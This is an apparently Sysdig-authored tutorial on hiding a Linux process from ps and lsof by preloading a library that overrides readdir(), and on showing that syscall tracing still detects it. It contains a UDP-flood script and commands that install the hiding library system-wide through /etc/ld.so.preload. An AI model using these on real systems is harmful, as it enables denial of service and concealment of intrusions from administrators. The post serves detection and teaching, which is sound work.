Introduction
The other day I was looking at the output of
top
on my machine, and I wondered: how hard would it be to hide specific processes and/or network connections from traditional monitoring tools like
ps
,
top
,
lsof
, …? I decided to kill a couple hours and try to hack together a solution. In this post, I’ll show you some of the answers I came up with, and some proof of concept code to implement this. I’ll also show that sysdig is not susceptible to my hack, and explain why.
The goal that I want to achieve is to deliberately hide a simple and malicious Python script (I’ll call it
evil_script.py
) that does some damage to my system, saturating CPU and network by sending UDP packets towards a poor victim:
#!/usr/bin/python
import socket
import sys
def send_traffic(ip, port):
print "Sending burst to " + ip + ":" + str(port)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect((ip, port))
while True:
sock.send("I AM A BAD BOY")
if len(sys.argv) != 3:
print "Usage: " + sys.argv[0] + " IP PORT"
sys.exit()
send_traffic(sys.argv[1], int(sys.argv[2])) Let’s go!
The Baseline Behavior
I’ll start by running this:
gianluca@sid:~$ ./evil_script.py 1.2.3.4 666
Sending burst to 1.2.3.4:666
If you run it, you’ll see it will quickly saturate your system resources. Perfect use case for starting the analysis. Let’s confirm that the process is there and eating my CPU, using
ps
:
gianluca@sid:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
...
gianluca 8585 105 0.0 34256 6152 pts/6 R+ 12:03 0:07 /usr/bin/python ./evil_script.py 1.2.3.4 666
...
Yep. I can also look at the network connections opened by the process by using
lsof
:
gianluca@sid:~$ sudo lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
...
evil_scri 8290 gianluca 3u IPv4 23936 0t0 UDP 172.16.189.136:33220->1.2.3.4:666
...
So the process is there, doing network activity. If I want to hide this information, the first thing I have to do is understand how
ps
and similar tools can actually extract the information about my process.
How ps works
Tools like
ps
leverage the
/proc
file system, a Linux construct that we explained at a high level in a
previous post. Let’s dig into the details now using
sysdig
:
gianluca@sid:~$ sudo sysdig proc.name = ps
...
447463 23:54:12.077878685 2 ps (3214) > openat dirfd=AT_FDCWD name=/proc flags=1089(O_DIRECTORY|O_NONBLOCK|O_RDONLY) mode=0
447465 23:54:12.077880122 2 ps (3214) < openat fd=5(/proc)
447473 23:54:12.077887674 2 ps (3214) > getdents
447486 23:54:12.077988237 2 ps (3214) < getdents ... 452546 23:54:12.082257864 2 ps (3214) > open
452547 23:54:12.082259424 2 ps (3214) < open fd=6(/proc/3174/stat) name=/proc/3174/stat flags=1(O_RDONLY) mode=0
452548 23:54:12.082259730 2 ps (3214) > read fd=6(/proc/3174/stat) size=1024
452549 23:54:12.082262601 2 ps (3214) < read res=322 data=3174 (evil_script.py) R 3089 3174 3089 34816 3174 4202496 1620 0 15 0 8 3474 0 0 452550 23:54:12.082262874 2 ps (3214) > close fd=6(/proc/3174/stat)
452551 23:54:12.082262982 2 ps (3214) < close res=0 452552 23:54:12.082266445 2 ps (3214) > open
452553 23:54:12.082267682 2 ps (3214) < open fd=6(/proc/3174/status) name=/proc/3174/status flags=1(O_RDONLY) mode=0
452554 23:54:12.082268000 2 ps (3214) > read fd=6(/proc/3174/status) size=1024
452555 23:54:12.082274407 2 ps (3214) < read res=854 data=Name:.evil_script.py.State:.R (running).Tgid:.3174.Ngid:.0.Pid:.3174.PPid:.3089. 452556 23:54:12.082274624 2 ps (3214) > close fd=6(/proc/3174/status)
452557 23:54:12.082274724 2 ps (3214) < close res=0 452558 23:54:12.082276935 2 ps (3214) > open
452559 23:54:12.082278171 2 ps (3214) < open fd=6(/proc/3174/cmdline) name=/proc/3174/cmdline flags=1(O_RDONLY) mode=0
452560 23:54:12.082278466 2 ps (3214) > read fd=6(/proc/3174/cmdline) size=131072
452561 23:54:12.082280215 2 ps (3214) < read res=46 data=/usr/bin/python../evil_script.py.1.2.3.4.6666. 452562 23:54:12.082280463 2 ps (3214) > read fd=6(/proc/3174/cmdline) size=131026
452563 23:54:12.082280814 2 ps (3214) < read res=0 data= 452564 23:54:12.082281083 2 ps (3214) > close fd=6(/proc/3174/cmdline)
452565 23:54:12.082281216 2 ps (3214) < close res=0
This perfectly highlights how
ps
works: first, the directory
/proc
is opened via the
openat()
system call. Then, the process calls
getdents()
on the opened directory, which is a system call that returns the list of files/directories contained in a specific directory (
/proc
in this case). If you’ve ever run
ls /proc
, you noticed that there is a subdirectory for every running process in the system, and each directory is named after the PID of the process itself. So,
ps
will just grab the list from
getdents()
, and then iterate over a fixed set of files in each subdirectory. These files, as you can see from the event list, are named
/proc/PID/status
,
/proc/PID/stat
, and
/proc/PID/cmdline
, and contain all the information that ps shows in the output.
It’s worth noticing (as it will be useful in the next section), that the process itself doesn’t directly call
openat()
and
getdents()
, as those are system calls that are abstracted by the C standard library (
libc
). If you ever cared to read the
libc
documentation,
libc
provides two different functions,
opendir()
and
readdir()
, and they take care of calling the system calls themselves, providing a somewhat simpler API to the developer. So these last ones are the functions that are directly called from
ps
.
Hiding the process
After this quick digression on how
ps
works, it seems fairly obvious that if we want to hide our process, we need a way to prevent these tools from accessing the proper files under
/proc/PID/
. What are the options? There are various methods worth mentioning:
- Using a proper framework: there are a bunch of very good frameworks, like SELinux and Grsecurity that do, among other things, exactly this. In a production system, I would absolutely consider these, although today I want to get my hands dirty and have fun creating something from scratch.
- Modify top/ps/… binaries: I could grab the source code of each of these tools, implement my own “hiding linux processes” logic, recompile, and replace the binaries. Very inefficient and time consuming.
- Modify
libc
: I could modify the readdir()
function inside libc
and input the code to exclude the access to some /proc
files. But recompiling libc
is a burden, not to mention the libc
code tends to be very hard to understand.
- Modify the system calls in the kernel: This is the most advanced, and it would work by intercepting and modifying the
getdents()
system call directly in the kernel with a custom module. It’s definitely tempting, but I won’t follow this route today because I’m already very familiar with how the system call interception works in sysdig, so I want to do something new.
I decided to go for an intermediate solution, one that is interesting and simple enough to implement in an hour or so: it’s a variant of “modifying
libc
” based on a tricky feature offered by the Linux dynamic linker (the component that takes care of loading the various libraries needed by a program at runtime), called
preloading.
With preloading, Linux is kind enough to give us the option to load a custom shared library before the other normal system libraries are loaded. This means that, if the custom library exports a function with the same signature of one found in a system library, we are literally able to override it with the custom code in our library, and all the processes will automatically pick our custom one!
This sounds like a solution to my problem, because I could write a very simple custom library that overrides
libc
’s
readdir()
, and write the logic to hide the process! The logic would be fairly straightforward too: every time I see that the
/proc/PID
directory (where PID is the PID of the process having the name “evil_script”) is being read, I just block that access in a clean way, thus hiding the entire directory! I went ahead and implemented these thoughts in code. You can get the sources at
https://github.com/gianlucaborello/libprocesshider/blob/master/processhider.c (it’s actually less than 100 lines of code including comments, so go read it!). Once the code is written, let’s compile it as a shared library, and install it in the system path:
gianluca@sid:~/libprocesshider$ make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
gianluca@sid:~/libprocesshider$ sudo mv libprocesshider.so /usr/local/lib/
Now, I just need to tell the dynamic linker to actually use it. I want to install it system-wide, so that every new process in the system can pick this up automatically. This is done by simply writing my library path into a configuration file:
root@sid:~# echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
Done! From this moment on, every new binary that I’ll launch will execute my custom code when iterating through directories via
readdir()
. So let’s go back and try this executing
ps
and
lsof
while the evil script is running:
gianluca@sid:~$ sudo ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
...
gianluca@sid:~$ sudo lsof -ni
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
...
It works! My process is now running in invisible mode, even when the tools are run as root. I also repeated this with
pstree
,
top
and
htop
, and none of them were able to show my process anymore.
This is just a simple example, but we could also spoof more information, for example:
- Modify the global CPU usage counters:
/proc/stat
contains those statistics, so I could intercept all the read operations to that file and return a custom one, faking a 0% global CPU usage.
- Modify the connection list: for example, netstat uses the
/proc/net/tcp
file to get the list of TCP connections. Just intercept the reads to the file and hide a specific connection.
Good exercises for the reader :)
Note that this method won’t work if the binaries are statically linked against
libc
. I’ve seen some niche distributions extremely focused on security, where all the binaries dependencies are statically linked. This has the huge disadvantage that the binaries tend to get pretty big, and shipping an update for a library forces shipping new binaries of every program that depends on it, so usually it’s not done for mainstream distributions.
Sysdig
Let’s see if sysdig can be tricked as well, starting by CPU usage:
gianluca@sid:~$ sudo sysdig -c topprocs_cpu
CPU% Process
------------------------------
99.99% evil_script.py
2.46% sysdig
0.27% java
0.03% sshd
And network activity:
gianluca@sid:~$ sudo sysdig -c topprocs_net
Bytes Process
------------------------------
862.53KB evil_script.py
400B sshd
gianluca@sid:~$ sudo sysdig -c topconns
Bytes Proto Connection
------------------------------
841.79KB udp 172.16.189.136:54241->1.2.3.4:8888
496B tcp 172.16.189.1:57832->172.16.189.136:22
With sysdig, we’re still able to see it all! This is because sysdig doesn’t necessarily rely on
/proc
to look for system activity (although it uses it if available). Sysdig inspects every system call, and in this data the malicious process is still clearly visible, along with all its used resources. Hiding system calls is a much more challenging task that can’t be done in a couple hours. In fact, sysdig can see
everything:
gianluca@sid:~$ sudo sysdig proc.name contains evil_script
261683 19:27:57.433924531 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
261684 19:27:57.433930125 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY 261685 19:27:57.433931321 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
261686 19:27:57.433970361 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY 261687 19:27:57.433975269 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
261688 19:27:57.433980600 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY 261689 19:27:57.433981682 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
261690 19:27:57.434022148 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY 261691 19:27:57.434026297 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
...
As a bonus, sysdig is also showing me that the dynamic linker is loading my custom library before
libc
. This is what happens when
ps
executes after the preload change:
gianluca@sid:~$ sudo sysdig proc.name = ps
2731 00:21:52.721054253 1 ps (3351) < execve res=0 exe=ps args=aux. tid=3351(ps) pid=3351(ps) ptid=3111(bash) cwd=/home/gianluca fdlimit=1024 pgft_maj=0 pgft_min=62 vm_size=512 vm_rss=4 vm_swap=0
...
2739 00:21:52.721129329 1 ps (3351) < open fd=3(/usr/local/lib/libprocesshider.so) name=/usr/local/lib/libprocesshider.so flags=1(O_RDONLY) mode=0
2740 00:21:52.721130670 1 ps (3351) > read fd=3(/usr/local/lib/libprocesshider.so) size=832
...
2810 00:21:52.721293540 1 ps (3351) > open
2811 00:21:52.721296677 1 ps (3351) < open fd=3(/lib/x86_64-linux-gnu/libc.so.6) name=/lib/x86_64-linux-gnu/libc.so.6 flags=1(O_RDONLY) mode=0
2812 00:21:52.721297343 1 ps (3351) > read fd=3(/lib/x86_64-linux-gnu/libc.so.6) size=832
...
/usr/local/lib/libprocesshider.so
is automatically loaded (with
open()
and
read()
) before
/lib/x86_64-linux-gnu/libc.so.6
, without having to change the
ps
code or the
libc
code.
In theory, I could have used
strace/ltrace
to attach to the process and see what it was doing in a similar way, but if you remember I completely hid the malicious process PID from
/proc
, so how would we find it? Those tools require the exact PID to attach in order to work. I could have brute-forced the entire PID range, but that doesn’t seem like a very attractive alternative. Also, those tools just provide a flat list of events, whereas sysdig, with chisels, can aggregate the events and show me exactly what I care about (in this case CPU/network consumption).
Final notes
As one last consideration, it’s worth clarifying that although it might be possible to get your machine compromised in this exact way (I know there are rootkits out there who rely on this easy and effective method), that is certainly not the point of this post. I just enjoyed it as a thought experiment, and hopefully this demonstrates a simple and powerful method that can be used by application developers to solve real problems in certain circumstances. I think this also proves that monitoring the system usage can be done from different perspectives, and getting data from system calls can be as good as extracting it from the
/proc
file system. And at the end of the day, I think we’re all very lucky to have Linux and the
/proc
file system with its useful metrics exported in plain-text files, ready to be read and inspected without any custom tools!
As always, we’d love to hear from you. If you have any thoughts or questions, please let us know in the comments or on
@sysdig. Thanks!